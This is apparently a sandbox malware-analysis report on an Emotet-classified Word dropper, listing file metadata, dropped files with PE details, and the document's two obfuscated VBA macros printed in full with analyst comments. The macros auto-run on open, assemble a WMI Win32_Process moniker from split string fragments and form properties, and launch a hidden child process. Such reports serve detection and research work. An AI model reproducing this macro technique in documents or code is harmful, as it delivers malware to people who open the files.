VTI SCORE: 100/100
Dynamic Analysis Report |
Classification: |
Dropper
Downloader
Spyware
|
Threat Names: |
Emotet
Generic.EmotetU.C1B1709D
Gen:Variant.Razy.494038
...
|
sample.doc
Word Document
Created at 2020-01-21T19:55:00
Remarks
(0x0200000C): The maximum memory dump size was exceeded. Some dumps may be missing in the report.
This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
Filename | Category | Type | Severity | Actions |
---|
C:\Users\aETAdzjz\Desktop\sample.doc | Sample File | Word Document |
Malicious
|
»
Office Information
»
Title | Eaque. |
Creator | Romain Lambert |
Revision | 1 |
Create Time | 2020-01-21 17:53:00+00:00 |
Modify Time | 2020-01-21 17:53:00+00:00 |
Document Information
»
Codepage | ANSI_Latin1 |
Application | Microsoft Office Word |
App Version | 16.0 |
Template | Normal.dotm |
Document Security | NONE |
Page Count | 1 |
Line Count | 1 |
Paragraph Count | 1 |
Word Count | 4 |
Character Count | 28 |
Chars With Spaces | 31 |
scale_crop | False |
shared_doc | False |
Controls (2)
»
CLSID | Control Name | Associated Vulnerability |
---|---|---|
{00020906-0000-0000-C000-000000000046} | Word97 | - |
{6E182020-F460-11CE-9BCD-00AA00608E01} | FormsFrame | - |
VBA Macros (2)
»
Macro #1: Halpaohsi
»
Attribute VB_Name = "Halpaohsi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
' Auto-executing entry point: Word raises Document_Open when the file is opened
' (VB_Base "1Normal.ThisDocument" and VB_PredeclaredId = True above mark this
' as the ThisDocument module). The handler does nothing itself; it immediately
' hands off to Phffmgfhyakn in the second macro module and discards its result.
Call Phffmgfhyakn
End Sub
Macro #2: Tslcncqezxxw
»
Attribute VB_Name = "Tslcncqezxxw"
' Builds the string that Phffmgfhyakn later passes (prefixed with the never
' assigned variable er) as the first argument of Nbjlfulfh.Create. The value is
' assembled from four pieces — ChrW(wdKeyP) ("P": wdKeyP is Word's WdKey constant
' 80), the Dmhwktuoqw and Mspgvegbrck properties of Xvzwvdjxjbaph, and the
' GroupName of its Srghtmcdobug control — then Split on the separator
' "=mmuusns=" and Joined with "", so every occurrence of the separator is
' removed. Xvzwvdjxjbaph is not defined in either listed module; presumably it
' is a UserForm (a FormsFrame control appears in the Controls section) whose
' control properties carry the real text — TODO confirm from the form stream.
' Everything else in the body is filler: For loops and If blocks whose results
' (ewr, gggs, wer3 and the single-use names) are never read anywhere in the
' visible macro. rgfasd, dsf, er, sdf and I are never assigned here and no
' declaration is visible in either module; without Option Explicit they are
' implicit Empty Variants, so the filler executes without error and does not
' influence the return value.
Function Cxwtfasbi()
' --- filler block (same four-statement shape repeats throughout) ---
For Ummppcjymvmfw = rgfasd To Mbeqdzhakotiy
ewr = dsf - CVar(er * 23)
Ozuiphpxdsni = CSng(Qrwnlqfsd)
Nmbbvukqshnko = CLng(Wdbxpruutww)
Next
If er > Rowwwmbvov Then
gggs = Sin(3)
Crtydgixxtbqg = Srhezzyzd
Obosihuynzb = CByte(8 - CSng(3))
End If
If sdf > Qoxoxmfqohi Then
wer3 = Sin(1)
Rizesqnmr = Fluwhufrur
Bjbqfaaufo = CByte(234 - CSng(3))
End If
For Lzjhkjdzioj = rgfasd To Jitbrjpcxxuq
ewr = dsf - CDbl(er * 23)
Mrldqjdkh = CSng(Glnpbnapywrgt)
Mnoboqlbr = CLng(Ksdpybickxbnw)
Next
' First real statement: "P" (I is unassigned, so an Empty Variant adds nothing).
Psyxizhgdtcsr = I + ChrW(wdKeyP)
For Haeiuvmwpueta = rgfasd To Arbtkeldv
ewr = dsf - CVar(er * 23)
Hiccshwszmljt = CSng(Fujgvdcvsutfz)
Xjywoetnbxxhl = CLng(Ihllyquooue)
Next
If er > Izbxxepbkx Then
gggs = Sin(3)
Lhhiywradmlu = Fcukckrjebwzk
Nxjrqnimf = CByte(8 - CSng(3))
End If
If sdf > Mmhwnhjbymhav Then
wer3 = Sin(1)
Cdfmzmku = Cdwiwqouexe
Ooqiitfwo = CByte(234 - CSng(3))
End If
For Kfgsqlcrrhl = rgfasd To Scwsgrmzau
ewr = dsf - CDbl(er * 23)
Idbbksnwjyqjw = CSng(Unkbckdpgwnq)
Njlouhiaphoy = CLng(Ulnwcysm)
Next
' Second real statement: append two form properties (content not visible here).
Xgnhnban = Psyxizhgdtcsr + Xvzwvdjxjbaph.Dmhwktuoqw + Xvzwvdjxjbaph.Mspgvegbrck
For Rvikdnfkowx = rgfasd To Pexrfnlrx
ewr = dsf - CVar(er * 23)
Zkbugpnmcl = CSng(Fgwgodgxxm)
Oceredxtuxksl = CLng(Yjkztktr)
Next
If er > Gwoqdombd Then
gggs = Sin(3)
Lvhzokpi = Vdzinmnqm
Tjyhjdriyr = CByte(8 - CSng(3))
End If
If sdf > Znocaeaej Then
wer3 = Sin(1)
Lsoiqbzl = Trmjrfhyzx
Zauzknlmqbe = CByte(234 - CSng(3))
End If
For Ouubhzfqsg = rgfasd To Siztfjrq
ewr = dsf - CDbl(er * 23)
Onqrmzevrnhx = CSng(Mxsyhxgtzy)
Mtksnonv = CLng(Kpnflxoit)
Next
' Third piece comes from a control's GroupName property; then the separator
' "=mmuusns=" is stripped by splitting on it (the array is re-joined below).
sss = Xvzwvdjxjbaph.Srghtmcdobug.GroupName
Hsiszpxdwvzre = Split(Xgnhnban + CStr(Trim(sss)), "=mmuusns=")
For Nfkmwqidjzol = rgfasd To Myxgwvdlvca
ewr = dsf - CVar(er * 23)
Cmpcqnaabwc = CSng(Okukbnajspyqw)
Ckimrzgruwx = CLng(Olcvaxgtq)
Next
If er > Meijwqlu Then
gggs = Sin(3)
Xroqozisan = Tuhndpzlxly
Nqwudkccxqtne = CByte(8 - CSng(3))
End If
If sdf > Xaqxvylncjnwu Then
wer3 = Sin(1)
Msgrajmywc = Veozzccnwv
Bcdulqoisl = CByte(234 - CSng(3))
End If
For Hmmolctu = rgfasd To Pjnjnuswoq
ewr = dsf - CDbl(er * 23)
Qyfsngotujzn = CSng(Qnbubgtpmu)
Ctpvwnjn = CLng(Itpngzrfjar)
Next
' Return value: the fragments concatenated with the separator removed.
Cxwtfasbi = Join(Hsiszpxdwvzre, "")
For Hacdoyen = rgfasd To Wpojmowng
ewr = dsf - CVar(er * 23)
Vbahfauijsvq = CSng(Mlxwizrpyfmr)
Vrrldgmybw = CLng(Kfcpazorzcyqx)
Next
If er > Gcvuopin Then
gggs = Sin(3)
Kmsfnkbn = Mmjenctmttb
Cgwgbuicsk = CByte(8 - CSng(3))
End If
If sdf > Mvllswcmdqt Then
wer3 = Sin(1)
Hlvvtyzwbqz = Ztcmucuo
Haaxybhmm = CByte(234 - CSng(3))
End If
For Uimgymptkfm = rgfasd To Wijrwrzcgeo
ewr = dsf - CDbl(er * 23)
Bavudnppflpg = CSng(Evpbvgmaqsp)
Cmodykflpyqb = CLng(Yrxukzavh)
Next
End Function
' Main routine, reached from Document_open. Ignoring the filler loops and If
' blocks (the same no-op pattern as in Cxwtfasbi: rgfasd, dsf, er, sdf are never
' assigned and the assigned names are never read), it does the following:
'   1. Builds Mbxypfjaagzo by joining a "=mmuusns="-separated string. The
'      visible literal fragments read "winmgmtS:win32_" + Xvzwvdjxjbaph.Rghedtey
'      + "rocess" + T (T is never assigned in the visible macro, so presumably
'      Empty). That is, presumably, a WMI moniker for the Win32_Process class once
'      the form property supplies the missing letter — TODO confirm against the
'      form's property values.
'   2. Binds that moniker with GetObject into Nbjlfulfh.
'   3. Appends ChrW(wdKeyS) ("S": WdKey constant 83), the Tag values of two form
'      controls and Rghedtey again to form a second moniker, binds it with
'      GetObject into the function's own return variable and sets its showwindow
'      property to False. It is then passed as the third argument of Create,
'      which for Win32_Process.Create is the process-startup-information object,
'      so this presumably resolves to Win32_ProcessStartup — TODO confirm.
'   4. Calls Nbjlfulfh.Create(er & Cxwtfasbi, Ttfwoikclybkw, Phffmgfhyakn,
'      Anrwyrkpnf) as the condition of an empty Do While loop, i.e. the call is
'      repeated until it returns a falsy value (Win32_Process.Create returns 0
'      on success). Ttfwoikclybkw and Anrwyrkpnf are never assigned here.
' Detection-relevant behaviour visible in this module: VBA in a Word document
' binding "winmgmt..." objects via GetObject and starting a child process with
' showwindow = False from the Word process.
Function Phffmgfhyakn()
' Separator-padded fragments of the first moniker; Rghedtey comes from the form.
dv = "in=mmuusns==mmuusns==mmuusns=mgm=mmuusns==mmuusns==mmuusns=t" + ChrW(wdKeyS) + ":=mmuusns==mmuusns=win=mmuusns==mmuusns=32=mmuusns==mmuusns=_" + Xvzwvdjxjbaph.Rghedtey + "r=mmuusns==mmuusns=oc=mmuusns==mmuusns==mmuusns=ess=mmuusns==mmuusns="
For Irhevqhybvg = rgfasd To Hhsopmqko
ewr = dsf - CVar(er * 23)
Gqorawher = CSng(Akmkjqycb)
Ftjcvmavdu = CLng(Xebpxfoc)
Next
If er > Bhhbfdzmlwuvk Then
gggs = Sin(3)
Ybudwflhk = Hbaxnkhhr
Ugxvriwfbtgh = CByte(8 - CSng(3))
End If
If sdf > Tyisqaxl Then
wer3 = Sin(1)
Ylojknddfchng = Dkenlatatum
Bbxigbxfunv = CByte(234 - CSng(3))
End If
For Dbwwfrhenpt = rgfasd To Uelupxopcdf
ewr = dsf - CDbl(er * 23)
Fdiixjzvx = CSng(Xourjome)
Gsuayxaabxry = CLng(Eweskxtxmh)
Next
' The separator used by Split below (same marker as in Cxwtfasbi).
fd = "=mmuusns="
For Ioqelyua = rgfasd To Iltypfpqhc
ewr = dsf - CVar(er * 23)
Czlgcqoovlkq = CSng(Maqsbzzgnbm)
Zzkomcpm = CLng(Ewemunwacryt)
Next
If er > Oaxtvmkuhmppk Then
gggs = Sin(3)
Nrdvhlwxnetra = Ffkkzlfw
Ikpsweczc = CByte(8 - CSng(3))
End If
If sdf > Uxhosdkpcvkkd Then
wer3 = Sin(1)
Fzxniunrya = Qzrryvdkh
Hhvhojyallnzc = CByte(234 - CSng(3))
End If
For Gfhginlxtpl = rgfasd To Pawccdpfnn
ewr = dsf - CDbl(er * 23)
Zauudzoqj = CSng(Cbujwjbrdgnll)
Wzlisriyim = CLng(Qpwmbabu)
Next
' Prefix "w", the fragments in dv, and the unassigned T; split on the separator.
Jmtxjlisob = Split("=mmuusns==mmuusns==mmuusns==mmuusns==mmuusns=w" + dv + T, fd)
For Fqyzinoym = rgfasd To Pultigwfb
ewr = dsf - CVar(er * 23)
Uvilpzyvlnj = CSng(Eynhnfqvqvjr)
Afskklpwdqwx = CLng(Qztgcspk)
Next
If er > Svfuezzutfy Then
gggs = Sin(3)
Dygdivwkpqqf = Cpdeqnes
Vsdrcejca = CByte(8 - CSng(3))
End If
If sdf > Hvogovdcfoo Then
wer3 = Sin(1)
Wfpbicnlkaiqr = Kgoeilvtpx
Apjqgegvwpiu = CByte(234 - CSng(3))
End If
For Fxugqwpusyak = rgfasd To Bladgknwak
ewr = dsf - CDbl(er * 23)
Lklvytgpgy = CSng(Hecfwlqwa)
Lpfnogiwkfel = CLng(Wagepfcmrv)
Next
' Re-join with "" — the separator is gone and the moniker text is contiguous.
Mbxypfjaagzo = Join(Jmtxjlisob, "")
For Fgpbircvm = rgfasd To Fmsrpghx
ewr = dsf - CVar(er * 23)
Vuhylhkc = CSng(Zbhvwkzbssq)
Qtqshshb = CLng(Eklhdwjs)
Next
If er > Tddfxufhgfm Then
gggs = Sin(3)
Qrfvpckqotyck = Weiaxikm
Umnavartnu = CByte(8 - CSng(3))
End If
If sdf > Atpizekfcmjck Then
wer3 = Sin(1)
Lnogfpkvqwqtt = Xqmydplpjf
Iidlptdfgz = CByte(234 - CSng(3))
End If
For Jqyzmjlqyt = rgfasd To Pmxhzxebdebm
ewr = dsf - CDbl(er * 23)
Azpacydcpn = CSng(Datllptkvc)
Fjulgeolmbila = CLng(Qpmxkqnteis)
Next
' Bind the first moniker; Nbjlfulfh is the object whose Create is called below.
Set Nbjlfulfh = GetObject(Mbxypfjaagzo)
For Dlaqwtsa = rgfasd To Xedfhncc
ewr = dsf - CVar(er * 23)
Nszuzkhonwyb = CSng(Esmykmztsyfik)
Jlmjomkmgrm = CLng(Mzgwzdbp)
Next
If er > Susuaaoq Then
gggs = Sin(3)
Ydklspmt = Hxbwgssjj
Aihuowsk = CByte(8 - CSng(3))
End If
If sdf > Bmhejovdjrhj Then
wer3 = Sin(1)
Utwoiiehucyvd = Tujvnglt
Dxgzpurnlzvzd = CByte(234 - CSng(3))
End If
For Otsfgnle = rgfasd To Wxohpjzfrel
ewr = dsf - CDbl(er * 23)
Ehgirqiuq = CSng(Zmtokjrsgjsw)
Vqwtmxrpl = CLng(Afunrvgqvicpk)
Next
' Second moniker: first moniker + "S" + two control Tag values (+ Rghedtey below).
Epuodgcp = Xvzwvdjxjbaph.Qgnmwpcsosft.Tag
Nwlspbgev = Mbxypfjaagzo + ChrW(wdKeyS) + Xvzwvdjxjbaph.Hmqtdcvzqfs.Tag + Epuodgcp
For Jznxrrsnztkw = rgfasd To Icwwpescgsond
ewr = dsf - CVar(er * 23)
Erxqtqfhjlgio = CSng(Rongvkdbb)
Hsvjeocpvcmgh = CLng(Unliveda)
Next
If er > Zxtnbpwktjmmz Then
gggs = Sin(3)
Fyddfifxsppq = Vdrvjeqicu
Voyqineppgz = CByte(8 - CSng(3))
End If
If sdf > Rtabxlzczygu Then
wer3 = Sin(1)
Ccxvjromryb = Mdupeuar
Geinnwqsvrw = CByte(234 - CSng(3))
End If
For Skqfgfcbaqk = rgfasd To Fibaqzrlqqada
ewr = dsf - CDbl(er * 23)
Ffpekqbe = CSng(Tlhogoyaorh)
Bxjbctpbgpbw = CLng(Fciddnlx)
Next
Fhmdqkvcai = Nwlspbgev + Xvzwvdjxjbaph.Rghedtey
For Lazvwlklomuqv = rgfasd To Bfspfsvlezbl
ewr = dsf - CVar(er * 23)
Djsngryqnjtae = CSng(Oiegnsfwcze)
Uwuaonkcccp = CLng(Lsjvfoyypqxe)
Next
If er > Ynpocckwr Then
gggs = Sin(3)
Mrmkmfpwshnm = Pqqefxvfhmpm
Ilpbuctxmnc = CByte(8 - CSng(3))
End If
If sdf > Hqxkajuml Then
wer3 = Sin(1)
Lrxgjauarbo = Msdasecbtpnp
Pcubwrxp = CByte(234 - CSng(3))
End If
For Moltcugti = rgfasd To Ifttgrprbkqyy
ewr = dsf - CDbl(er * 23)
Xarpuxozndsjz = CSng(Ugfdhwahqz)
Buwpnoewfbtka = CLng(Gqniqrspk)
Next
' Bind the second moniker into the function's return variable (a bare function
' name inside its own body refers to that variable, not to a recursive call).
Set Phffmgfhyakn = GetObject(Fhmdqkvcai)
For Pudwquipw = rgfasd To Twkbeeebb
ewr = dsf - CVar(er * 23)
Ujelxdldnb = CSng(Mdvwekrpwmxwg)
Gqygnvgaure = CLng(Dsnfyyxxi)
Next
If er > Rjumimhfpmemp Then
gggs = Sin(3)
Dfdbfannl = Ryhjtxiypdaus
Ygrzfxjqvr = CByte(8 - CSng(3))
End If
If sdf > Czdwihiuj Then
wer3 = Sin(1)
Theqgdcll = Bgvmybihmszq
Lhsmjmabayrbh = CByte(234 - CSng(3))
End If
For Sgiohxwawj = rgfasd To Bkntqyquwk
ewr = dsf - CDbl(er * 23)
Guagwuxt = CSng(Umrcycpgwdca)
Mfbdrjqhhfh = CLng(Qdblnhgqbcozo)
Next
' Hidden window for the process started below (statement split by " _").
Phffmgfhyakn. _
showwindow = False
For Egpwnmsp = rgfasd To Nziwmlcoxazlv
ewr = dsf - CVar(er * 23)
Dlzspewhcf = CSng(Nucpbesqtki)
Qnsmbtkrlk = CLng(Xftrsgrexptv)
Next
If er > Hchrsdrjzrdva Then
gggs = Sin(3)
Xbkcwdyzzaerd = Txacliku
Angcnxffhzojt = CByte(8 - CSng(3))
End If
If sdf > Jdhqnloxyxfu Then
wer3 = Sin(1)
Pmgsewqrwmdzl = Mjemhcecdd
Qiehdggsmh = CByte(234 - CSng(3))
End If
For Rergvnoatkm = rgfasd To Hrwkkdpt
ewr = dsf - CDbl(er * 23)
Jreasfdzetqvc = CSng(Hqplsfvqgvpji)
Bvhehprnv = CLng(Livkmolmdma)
Next
' Empty loop: Create is re-invoked while it returns a truthy (non-zero) value,
' i.e. until it reports success. The first argument is the string built by
' Cxwtfasbi; the third is the startup object configured just above.
Do While Nbjlfulfh. _
Create(er & Cxwtfasbi, Ttfwoikclybkw, Phffmgfhyakn, Anrwyrkpnf)
Loop
For Prlhuwaksj = rgfasd To Rzvqamgzdxk
ewr = dsf - CVar(er * 23)
Eyhuwmtjqih = CSng(Vlydskeg)
Lodfalishvsq = CLng(Pvxzearoearu)
Next
If er > Fzmjugwf Then
gggs = Sin(3)
Sxiqzqifo = Wmfbjbwkdog
Nhiivrvkc = CByte(8 - CSng(3))
End If
If sdf > Gsbonslgu Then
wer3 = Sin(1)
Nhhlezvpr = Zcsizjxkcuv
Qaiwkczpvfub = CByte(234 - CSng(3))
End If
For Mvomzustyw = rgfasd To Bjjjnsimuerz
ewr = dsf - CDbl(er * 23)
Myexxgyzkpo = CSng(Ecxcmqraqflr)
Ppiephkhuoby = CLng(Cyuvewejxcfi)
Next
End Function
Document Content
»
c:\users\aetadzjz\appdata\local\temp\~dfc9208b8177d1ee10.tmp | Dropped File | Unknown |
Whitelisted
|
»
File Reputation Information
»
Severity |
Whitelisted
|
First Seen | 2013-03-17 16:11 (UTC+1) |
Last Seen | 2019-02-22 02:24 (UTC+1) |
c:\users\aetadzjz\appdata\local\temp\~df7fae8046229cf905.tmp | Dropped File | Stream |
Whitelisted
|
»
File Reputation Information
»
Severity |
Whitelisted
|
First Seen | 2011-07-06 01:20 (UTC+2) |
Last Seen | 2019-12-06 01:08 (UTC+1) |
C:\Users\aETAdzjz\AppData\Local\sendduck\sendduckb.exe | Dropped File | Binary |
Whitelisted
|
»
File Reputation Information
»
Severity |
Whitelisted
|
First Seen | 2012-10-01 02:48 (UTC+2) |
Last Seen | 2019-12-02 13:40 (UTC+1) |
PE Information
»
Image Base | 0x100000000 |
Entry Point | 0x10000bdfc |
Size Of Code | 0xf800 |
Size Of Initialized Data | 0x4400 |
File Type | FileType.executable |
Subsystem | Subsystem.windows_gui |
Machine Type | MachineType.amd64 |
Compile Timestamp | 2009-07-14 00:08:46+00:00 |
Version Information (8)
»
CompanyName | Microsoft Corporation |
FileDescription | Application Layer Gateway Service |
FileVersion | 6.1.7600.16385 (win7_rtm.090713-1255) |
InternalName | ALG.exe |
LegalCopyright | © Microsoft Corporation. All rights reserved. |
OriginalFilename | ALG.exe |
ProductName | Microsoft® Windows® Operating System |
ProductVersion | 6.1.7600.16385 |
Sections (5)
»
Name | Virtual Address | Virtual Size | Raw Data Size | Raw Data Offset | Flags | Entropy |
---|---|---|---|---|---|---|
.text | 0x100001000 | 0xf7fe | 0xf800 | 0x400 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 5.98 |
.data | 0x100011000 | 0xe18 | 0x600 | 0xfc00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 2.36 |
.pdata | 0x100012000 | 0xfa8 | 0x1000 | 0x10200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 4.58 |
.rsrc | 0x100013000 | 0x1fc8 | 0x2000 | 0x11200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 5.5 |
.reloc | 0x100015000 | 0x28a | 0x400 | 0x13200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ | 2.9 |
Imports (9)
»
ADVAPI32.dll (9)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
SetServiceStatus | 0x0 | 0x100001000 | 0xfcf8 | 0xf0f8 | 0x2c0 |
RegisterServiceCtrlHandlerW | 0x0 | 0x100001008 | 0xfd00 | 0xf100 | 0x288 |
RegNotifyChangeKeyValue | 0x0 | 0x100001010 | 0xfd08 | 0xf108 | 0x25d |
RegCloseKey | 0x0 | 0x100001018 | 0xfd10 | 0xf110 | 0x230 |
RegOpenKeyExW | 0x0 | 0x100001020 | 0xfd18 | 0xf118 | 0x261 |
StartServiceCtrlDispatcherW | 0x0 | 0x100001028 | 0xfd20 | 0xf120 | 0x2c8 |
RegQueryValueExW | 0x0 | 0x100001030 | 0xfd28 | 0xf128 | 0x26e |
RegEnumKeyExW | 0x0 | 0x100001038 | 0xfd30 | 0xf130 | 0x24f |
SystemFunction036 | 0x0 | 0x100001040 | 0xfd38 | 0xf138 | 0x2f1 |
KERNEL32.dll (36)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
CreateEventW | 0x0 | 0x100001088 | 0xfd80 | 0xf180 | 0x85 |
WaitForMultipleObjects | 0x0 | 0x100001090 | 0xfd88 | 0xf188 | 0x506 |
Sleep | 0x0 | 0x100001098 | 0xfd90 | 0xf190 | 0x4c0 |
HeapSetInformation | 0x0 | 0x1000010a0 | 0xfd98 | 0xf198 | 0x2db |
WaitForSingleObject | 0x0 | 0x1000010a8 | 0xfda0 | 0xf1a0 | 0x508 |
SetEvent | 0x0 | 0x1000010b0 | 0xfda8 | 0xf1a8 | 0x467 |
CreateThread | 0x0 | 0x1000010b8 | 0xfdb0 | 0xf1b0 | 0xb4 |
CreateTimerQueueTimer | 0x0 | 0x1000010c0 | 0xfdb8 | 0xf1b8 | 0xbc |
DeleteTimerQueueTimer | 0x0 | 0x1000010c8 | 0xfdc0 | 0xf1c0 | 0xdb |
GetCurrentProcessId | 0x0 | 0x1000010d0 | 0xfdc8 | 0xf1c8 | 0x1c7 |
DuplicateHandle | 0x0 | 0x1000010d8 | 0xfdd0 | 0xf1d0 | 0xec |
GetCurrentProcess | 0x0 | 0x1000010e0 | 0xfdd8 | 0xf1d8 | 0x1c6 |
RaiseException | 0x0 | 0x1000010e8 | 0xfde0 | 0xf1e0 | 0x3b4 |
EnterCriticalSection | 0x0 | 0x1000010f0 | 0xfde8 | 0xf1e8 | 0xf2 |
LeaveCriticalSection | 0x0 | 0x1000010f8 | 0xfdf0 | 0xf1f0 | 0x33b |
WriteFile | 0x0 | 0x100001100 | 0xfdf8 | 0xf1f8 | 0x534 |
ReadFile | 0x0 | 0x100001108 | 0xfe00 | 0xf200 | 0x3c3 |
BindIoCompletionCallback | 0x0 | 0x100001110 | 0xfe08 | 0xf208 | 0x39 |
CloseHandle | 0x0 | 0x100001118 | 0xfe10 | 0xf210 | 0x52 |
GetProcessHeap | 0x0 | 0x100001120 | 0xfe18 | 0xf218 | 0x251 |
HeapAlloc | 0x0 | 0x100001128 | 0xfe20 | 0xf220 | 0x2d3 |
UnhandledExceptionFilter | 0x0 | 0x100001130 | 0xfe28 | 0xf228 | 0x4e2 |
TerminateProcess | 0x0 | 0x100001138 | 0xfe30 | 0xf230 | 0x4ce |
GetSystemTimeAsFileTime | 0x0 | 0x100001140 | 0xfe38 | 0xf238 | 0x280 |
GetCurrentThreadId | 0x0 | 0x100001148 | 0xfe40 | 0xf240 | 0x1cb |
GetTickCount | 0x0 | 0x100001150 | 0xfe48 | 0xf248 | 0x29a |
QueryPerformanceCounter | 0x0 | 0x100001158 | 0xfe50 | 0xf250 | 0x3a9 |
GetModuleHandleW | 0x0 | 0x100001160 | 0xfe58 | 0xf258 | 0x21e |
SetUnhandledExceptionFilter | 0x0 | 0x100001168 | 0xfe60 | 0xf260 | 0x4b3 |
GetStartupInfoW | 0x0 | 0x100001170 | 0xfe68 | 0xf268 | 0x26a |
InitializeCriticalSection | 0x0 | 0x100001178 | 0xfe70 | 0xf270 | 0x2ea |
DeleteCriticalSection | 0x0 | 0x100001180 | 0xfe78 | 0xf278 | 0xd2 |
DeleteTimerQueueEx | 0x0 | 0x100001188 | 0xfe80 | 0xf280 | 0xda |
CreateTimerQueue | 0x0 | 0x100001190 | 0xfe88 | 0xf288 | 0xbb |
GetLastError | 0x0 | 0x100001198 | 0xfe90 | 0xf290 | 0x208 |
HeapFree | 0x0 | 0x1000011a0 | 0xfe98 | 0xf298 | 0x2d7 |
msvcrt.dll (38)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
_unlock | 0x0 | 0x100001260 | 0xff58 | 0xf358 | 0x330 |
_lock | 0x0 | 0x100001268 | 0xff60 | 0xf360 | 0x1d5 |
?terminate@@YAXXZ | 0x0 | 0x100001270 | 0xff68 | 0xf368 | 0x30 |
memset | 0x0 | 0x100001278 | 0xff70 | 0xf370 | 0x484 |
_onexit | 0x0 | 0x100001280 | 0xff78 | 0xf378 | 0x27f |
??1type_info@@UEAA@XZ | 0x0 | 0x100001288 | 0xff80 | 0xf380 | 0x12 |
__dllonexit | 0x0 | 0x100001290 | 0xff88 | 0xf388 | 0x6d |
__set_app_type | 0x0 | 0x100001298 | 0xff90 | 0xf390 | 0x80 |
_fmode | 0x0 | 0x1000012a0 | 0xff98 | 0xf398 | 0x118 |
__setusermatherr | 0x0 | 0x1000012a8 | 0xffa0 | 0xf3a0 | 0x82 |
_amsg_exit | 0x0 | 0x1000012b0 | 0xffa8 | 0xf3a8 | 0xa0 |
_initterm | 0x0 | 0x1000012b8 | 0xffb0 | 0xf3b0 | 0x16c |
_wcmdln | 0x0 | 0x1000012c0 | 0xffb8 | 0xf3b8 | 0x371 |
exit | 0x0 | 0x1000012c8 | 0xffc0 | 0xf3c0 | 0x420 |
_cexit | 0x0 | 0x1000012d0 | 0xffc8 | 0xf3c8 | 0xb3 |
_exit | 0x0 | 0x1000012d8 | 0xffd0 | 0xf3d0 | 0xff |
_XcptFilter | 0x0 | 0x1000012e0 | 0xffd8 | 0xf3d8 | 0x52 |
__C_specific_handler | 0x0 | 0x1000012e8 | 0xffe0 | 0xf3e0 | 0x53 |
__wgetmainargs | 0x0 | 0x1000012f0 | 0xffe8 | 0xf3e8 | 0x8f |
__CxxFrameHandler3 | 0x0 | 0x1000012f8 | 0xfff0 | 0xf3f0 | 0x57 |
_callnewh | 0x0 | 0x100001300 | 0xfff8 | 0xf3f8 | 0xb1 |
malloc | 0x0 | 0x100001308 | 0x10000 | 0xf400 | 0x474 |
_CxxThrowException | 0x0 | 0x100001310 | 0x10008 | 0xf408 | 0x4c |
??0exception@@QEAA@AEBQEBDH@Z | 0x0 | 0x100001318 | 0x10010 | 0xf410 | 0xb |
memmove | 0x0 | 0x100001320 | 0x10018 | 0xf418 | 0x482 |
realloc | 0x0 | 0x100001328 | 0x10020 | 0xf420 | 0x497 |
??0exception@@QEAA@XZ | 0x0 | 0x100001330 | 0x10028 | 0xf428 | 0xd |
memmove_s | 0x0 | 0x100001338 | 0x10030 | 0xf430 | 0x483 |
memcpy_s | 0x0 | 0x100001340 | 0x10038 | 0xf438 | 0x481 |
_wcsicmp | 0x0 | 0x100001348 | 0x10040 | 0xf440 | 0x379 |
free | 0x0 | 0x100001350 | 0x10048 | 0xf448 | 0x43a |
?what@exception@@UEBAPEBDXZ | 0x0 | 0x100001358 | 0x10050 | 0xf450 | 0x32 |
??0exception@@QEAA@AEBV0@@Z | 0x0 | 0x100001360 | 0x10058 | 0xf458 | 0xc |
isdigit | 0x0 | 0x100001368 | 0x10060 | 0xf460 | 0x454 |
??1exception@@UEAA@XZ | 0x0 | 0x100001370 | 0x10068 | 0xf468 | 0x11 |
??0exception@@QEAA@AEBQEBD@Z | 0x0 | 0x100001378 | 0x10070 | 0xf470 | 0xa |
_commode | 0x0 | 0x100001380 | 0x10078 | 0xf478 | 0xc4 |
memcpy | 0x0 | 0x100001388 | 0x10080 | 0xf480 | 0x480 |
ATL.DLL (6)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
(by ordinal) | 0x11 | 0x100001050 | 0xfd48 | 0xf148 | - |
(by ordinal) | 0x10 | 0x100001058 | 0xfd50 | 0xf150 | - |
(by ordinal) | 0x20 | 0x100001060 | 0xfd58 | 0xf158 | - |
(by ordinal) | 0x17 | 0x100001068 | 0xfd60 | 0xf160 | - |
(by ordinal) | 0x14 | 0x100001070 | 0xfd68 | 0xf168 | - |
(by ordinal) | 0x15 | 0x100001078 | 0xfd70 | 0xf170 | - |
WS2_32.dll (15)
»
API Name | Ordinal | IAT Address | Thunk RVA | Thunk Offset | Hint |
---|---|---|---|---|---|
htons | 0x9 | 0x1000011c8 | 0xfec0 | 0xf2c0 | - |
getpeername | 0x5 | 0x1000011d0 | 0xfec8 | 0xf2c8 | - |
getsockname | 0x6 | 0x1000011d8 | 0xfed0 | 0xf2d0 | - |
bind | 0x2 | 0x1000011e0 | 0xfed8 | 0xf2d8 | - |
WSASocketW | 0x0 | 0x1000011e8 | 0xfee0 | 0xf2e0 | 0x53 |
socket | 0x17 | 0x1000011f0 | 0xfee8 | 0xf2e8 | - |
closesocket | 0x3 | 0x1000011f8 | 0xfef0 | 0xf2f0 | - |
ntohs | 0xf | 0x100001200 | 0xfef8 | 0xf2f8 | - |
WSAIoctl | 0x0 | 0x100001208 | 0xff00 | 0xf300 | 0x36 |
listen | 0xd | 0x100001210 | 0xff08 | 0xf308 | - |
htonl | 0x8 | 0x100001218 | 0xff10 | 0xf310 | - |
setsockopt | 0x15 | 0x100001220 | 0xff18 | 0xf318 | - |
WSAStartup | 0x73 | 0x100001228 | 0xff20 | 0xf320 | - |
